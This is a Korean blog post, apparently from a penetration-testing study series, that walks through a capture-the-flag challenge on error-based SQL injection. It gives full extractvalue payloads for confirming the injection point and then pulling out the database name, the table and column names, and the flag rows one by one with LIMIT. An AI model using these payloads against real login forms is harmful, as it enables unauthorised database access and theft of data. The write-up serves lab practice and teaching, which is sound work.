이번 문제는 Error Based SQLi에 관한 문제이다.
우선 알고있는 "normaltic" 계정으로 로그인 해주면
정상적으로 출력되는 것을 볼 수 있다.
1. SQL Injection Point
SQL Injection이 가능한지 알아보기 위해 "normaltic' and '1' = '1"을 실행해보면 정상적으로 로그인이 된다.
이를 통해 SQL Injection이 가능함을 알 수 있다.
그 다음 SQL Injection중 어떤 방안을 접근할 지 알아보기 위해 " normaltic' "를 실행해 보면
SQL에러가 직접적으로 출력되는 것을 볼 수 있다. 이를 통해 Error Based SQL Injection을 활용하면된다는 것을 알 수 있다.
2. 에러를 출력 함수 선택
에러를 직접 추출하기 위해 'extractvalue' 함수를 사용해주겠다.
3. 공격 format 만들기
공격 format은 위의 정보를 바탕으로
' and extractvalue( '1', concat(0x3a, (__SQL__))) and '1' = '1해당 구문으로 만들어 주었다.
4. DB명 출력
DB명 출력 구문은
' and extractvalue( '1', concat(0x3a, (select database()))) and '1' = '1이렇게 작성하였고 출력해보면
위 처럼 DB명이 출력되는것을 알 수 있다.
5. Table명 출력
Table명 출력 구문은
' and extractvalue( '1', concat(0x3a, (select group_concat(table_name) from information_schema.tables where table_schema='DB명'))) and '1' = '1이렇게 작성하였고 이를 출력하면
총 2개의 테이블이 출력되는 것을 볼 수 있다.
6. Column 명 출력
위 테이블 중 'flag'와 관련된 데이블에 대한 Column명 출력 구문은
' and extractvalue( '1', concat(0x3a, (select group_concat(column_name) from information_schema.columns where table_name='테이블명'))) and '1' = '1이렇게 작성하였고 이를 출력해보면
flag와 관련한 컬럼 포함 총 2개의 컬럼이 출력되는 것을 알 수 있다.
7. DATA 출력
마지막으로 데이터를 출력하면 된다. DATA 출력 구문은
' and extractvalue( '1', concat(0x3a, (select 컬럼명 from 테이블명))) and '1' = '1이렇게 작성하였다.
우선 컬럼명 천제를 group_concat에 넣어 출력해보면
글자수 제한으로 인하여 에러 구문이 끊겨져서 나오는걸 알 수 있다.
이를 해결하기 위에 limit을 사용하면 된다.
우선 총 데이터의 수를 구하기 위해서 count 함수를 사용하여 출력해보면
총 17개의 데이터가 있다는 것을 알 수 있다.
limit을 사용하는 format은
' and extractvalue( '1', concat(0x3a, (select 컬럼명 from 데이터명 limit n,1))) and '1' = '1이렇게 만들어 주었다.
n값에 0 ~ 17까지의 숫자를 넣어 하나씩 출력해주면 플래그값을 얻을 수 있다.
'모의해킹 > 모의해킹 스터디' 카테고리의 다른 글
| 모의해킹 스터디 8주차 정리 (0) | 2024.12.10 |
|---|---|
| 모의해킹 스터디 CTF 문제 - SQL Injection 4 (0) | 2024.12.06 |
| 모의해킹 스터디 CTF 문제 - SQL Injection 3 (0) | 2024.12.04 |
| 모의해킹 스터디 CTF 문제 - SQL Injection (Blind Practice) (0) | 2024.12.04 |
| 모의해킹 스터디 CTF 문제 - Error Based SQLi Basic (0) | 2024.12.04 |